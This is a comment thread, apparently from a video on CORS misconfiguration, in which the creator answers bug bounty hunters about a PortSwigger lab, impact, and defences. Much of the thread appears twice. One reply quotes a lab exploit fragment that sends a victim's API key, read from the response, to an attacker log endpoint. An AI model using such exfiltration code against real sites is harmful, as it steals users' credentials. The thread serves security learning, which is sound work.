Have you done CORS experiments on portswigger? The first level why did I write an html+JavaScript script according to the official poc, send the request to the victim but can not get the api key?
You are making an AJAX request. If you follow that lab, you will see an API call made. Now you want to read the response. You put the AJAX request into a script. Then the victim visits that. The cookies are being sent along and the response is logged at the attacker server. You need to check the log files. Check the solution on Portswigger.. This is the key function reqListener() { location='/log?key='+this.responseText; Basically it will be logged at /log?key= Check the log once you delivered it to the victim
CORS policy does not directly prevent CSRF attacks because it controls access to responses rather than stopping requests from being made. Proper CSRF defenses, like CSRF tokens or SameSite cookies, are still required to protect against such attacks.
what if, the response has: Access-Control-Allow-Origin: * but, no "allow-credentials" popped on headers response. Is like, vulnerable in a real case scenario?
That totally depends. In a Penetration Test it's a finding with low CVSS score. In Bug Bounty it's usually closed as informative however I had 2 companies pay me as a low. Normally they say in the Ts and Cs. CORS with impact. To pass cookies and make it impactful you need the allow credentials. Hope that makes sense?
Not necessarily. A 302 is a temporary redirect. you should check how the redirect is initiated. If it's via "Location" usually you cant pull anything meaningful of. Sometimes however it will redirect via window.location and then you might be able to introduce XSS
Steal sensitive data: By exploiting a vulnerable CORS policy, attackers can bypass same-origin policies and retrieve sensitive information like user credentials, tokens, or personal data from another origin. Perform unauthorized actions: Attackers can send authenticated requests from a malicious website to a vulnerable API, performing actions on behalf of the victim, such as transferring funds or changing account settings, leading to account compromise or data manipulation.
For Bug Bounty you often don't need to exploit it and just report the reflected headers. Some will accept it and some won't. For impact it depends. Take a look at the CORS labs from the Web Security Academy. Typically you make an Ajax call from your own host to a sensitive (behind login) function
@@martinvoelkhey martin I hope you are well, I have been working on BBP as a hatchling and just discovered my first CORS misconfig. Reading through the comments I was looking for impact, and this has answered my questions. THANK YOU!!!!!
Ensure that the server only allows trusted origins to make cross-origin requests by properly configuring the Access-Control-Allow-Origin header. Additionally, use proper authentication and authorization mechanisms to prevent unauthorized access to sensitive resources.
simple and crisp clear. THANKS!
Glad you liked it!
Great explaination
Thanks
Thank you
Have you done CORS experiments on portswigger? The first level why did I write an html+JavaScript script according to the official poc, send the request to the victim but can not get the api key?
You are making an AJAX request. If you follow that lab, you will see an API call made. Now you want to read the response. You put the AJAX request into a script. Then the victim visits that. The cookies are being sent along and the response is logged at the attacker server. You need to check the log files. Check the solution on Portswigger.. This is the key
function reqListener() {
location='/log?key='+this.responseText;
Basically it will be logged at /log?key=
Check the log once you delivered it to the victim
Hello,
Does CORS policy helps in preventing CSRF attack.
CORS policy does not directly prevent CSRF attacks because it controls access to responses rather than stopping requests from being made. Proper CSRF defenses, like CSRF tokens or SameSite cookies, are still required to protect against such attacks.
what if, the response has:
Access-Control-Allow-Origin: *
but, no "allow-credentials" popped on headers response.
Is like, vulnerable in a real case scenario?
That totally depends. In a Penetration Test it's a finding with low CVSS score. In Bug Bounty it's usually closed as informative however I had 2 companies pay me as a low. Normally they say in the Ts and Cs. CORS with impact. To pass cookies and make it impactful you need the allow credentials. Hope that makes sense?
if the response says status302 not 200 is a serious vulnerability, can the attacker still take advantage of this ????
Not necessarily. A 302 is a temporary redirect. you should check how the redirect is initiated. If it's via "Location" usually you cant pull anything meaningful of. Sometimes however it will redirect via window.location and then you might be able to introduce XSS
Hi
What is the impact.... please 🥺
Steal sensitive data: By exploiting a vulnerable CORS policy, attackers can bypass same-origin policies and retrieve sensitive information like user credentials, tokens, or personal data from another origin.
Perform unauthorized actions: Attackers can send authenticated requests from a malicious website to a vulnerable API, performing actions on behalf of the victim, such as transferring funds or changing account settings, leading to account compromise or data manipulation.
How about CORS on POST request? Is that a vulnerability as well?
Yes absolutely. As a matter of fact you see CORS vulnerabilities often on POST requests
I find api subdomiNS BUT most of api endpoints are not accessible .
They probably need authentication. Most API endpoints will require some sort of authentication.
If i find a cors bug but it's on POST request how do i exploit it???? please reply
For Bug Bounty you often don't need to exploit it and just report the reflected headers. Some will accept it and some won't. For impact it depends. Take a look at the CORS labs from the Web Security Academy. Typically you make an Ajax call from your own host to a sensitive (behind login) function
@@martinvoelkhey martin I hope you are well, I have been working on BBP as a hatchling and just discovered my first CORS misconfig. Reading through the comments I was looking for impact, and this has answered my questions. THANK YOU!!!!!
@@ChristianScott-wj6qm cool
HOW TO PROTECT FROM THIS FFS?!
sorry, i listened for few minutes but you just repeated how this vulnerability works.
Ensure that the server only allows trusted origins to make cross-origin requests by properly configuring the Access-Control-Allow-Origin header. Additionally, use proper authentication and authorization mechanisms to prevent unauthorized access to sensitive resources.
Cross origin Resorce bug
yes